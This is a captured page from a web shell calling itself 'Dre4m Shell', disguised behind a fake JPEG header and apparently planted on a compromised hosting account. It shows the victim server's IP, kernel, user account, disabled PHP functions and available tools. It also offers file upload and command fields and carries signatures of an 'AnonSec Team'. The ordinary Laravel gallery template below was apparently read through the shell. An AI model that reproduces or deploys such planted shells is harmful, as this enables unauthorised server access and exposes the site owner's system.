ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.137.219.118
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnwebsiteUpgrade/resources/views/Gallery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnwebsiteUpgrade/resources/views/Gallery/details.blade.php
@extends('layouts.layout')
@section('pageTitle')
  Gallery Details
@endsection
@section('currentMedia')
    current-menu-item
@stop
<!-- /Header -->
@section('content')
@include('_partialView.PageTop', array('fileName' => '' ))
 <div class="container">

        <section id="content">
            <!-- Section -->
            <section class="full-width-bg">
                
                <div class="row">
                
                    <div class="col-lg-9 col-md-9 col-sm-8">

                        <div class="alert alert-success animate-onscroll">
                            <b>
                                <a href="{{url('gallery')}}" class="btn btn-warning">Back</a>
                                <div align="center" style="margin-top: -20px;">
                                    {{strtoupper("All Pictures from " . $groupName->group_description . "'s folder")}}
                                </div>
                            </b>
                        </div>

                        <div class="animate-onscroll">
                            <div class="banner-wrapper">
                                <div class="banner">
                                   <div class="row">
                                        <div class="col-lg-12 col-md-12-col-sm-12">
                                            <div class="body-ban">
                                            
                                           <!---->
                                             <div class="tz-gallery">
                                                <div class="row" style="margin: 10px;">
                                                    @foreach($getAllGroupPicture as $list)
                                                        <div class="col-sm-6 col-md-4" style="border: 1px solid #ddd; padding:5px; background: #ffffff; height:260px;"> 
                                                            <div align="center">
                                                                <a class="lightbox" href="{{asset('images/gallery/'. $list->image_link )}}">
                                                                    <img src="{{asset('images/gallery/'. $list->image_link )}}" class="" style="max-height:200px;"  alt="Park">
                                                                </a>
                                                            </div>
                                                            <div align="center"> 
                                                                <small>{{$list->image_description}}</small>
                                                            </div>
                                                        </div>
                                                    @endforeach
                                                </div><!--/row-->
                                            </div>
                                            <br/>
                                             <div align="right">
                                              Showing {{($getAllGroupPicture->currentpage()-1)*$getAllGroupPicture->perpage()+1}}
                                                      to {{$getAllGroupPicture->currentpage()*$getAllGroupPicture->perpage()}}
                                                      of  {{$getAllGroupPicture->total()}} entries
                                            </div>
                                            <div class="hidden-print">{{ $getAllGroupPicture->links() }}</div>
                                            <!---->
                                          
                                        
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                   <div class="col-lg-3 col-md-3 col-sm-4">
                        @include('_partialView.sidebar')
                   </div>
                </div>
            </section>
            <!-- /SideBar Section -->
        </section>
@stop

@section('styles')
    <link href="https://fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/baguettebox.js/1.8.1/baguetteBox.min.css">
    <link rel="stylesheet" href="{{asset('thumbnail-gallery.css')}}">
@stop

@section('scripts')
    <script src="https://cdnjs.cloudflare.com/ajax/libs/baguettebox.js/1.8.1/baguetteBox.min.js"></script>
    <script>
        baguetteBox.run('.tz-gallery');
    </script>
@stop

Anon7 - 2022
AnonSec Team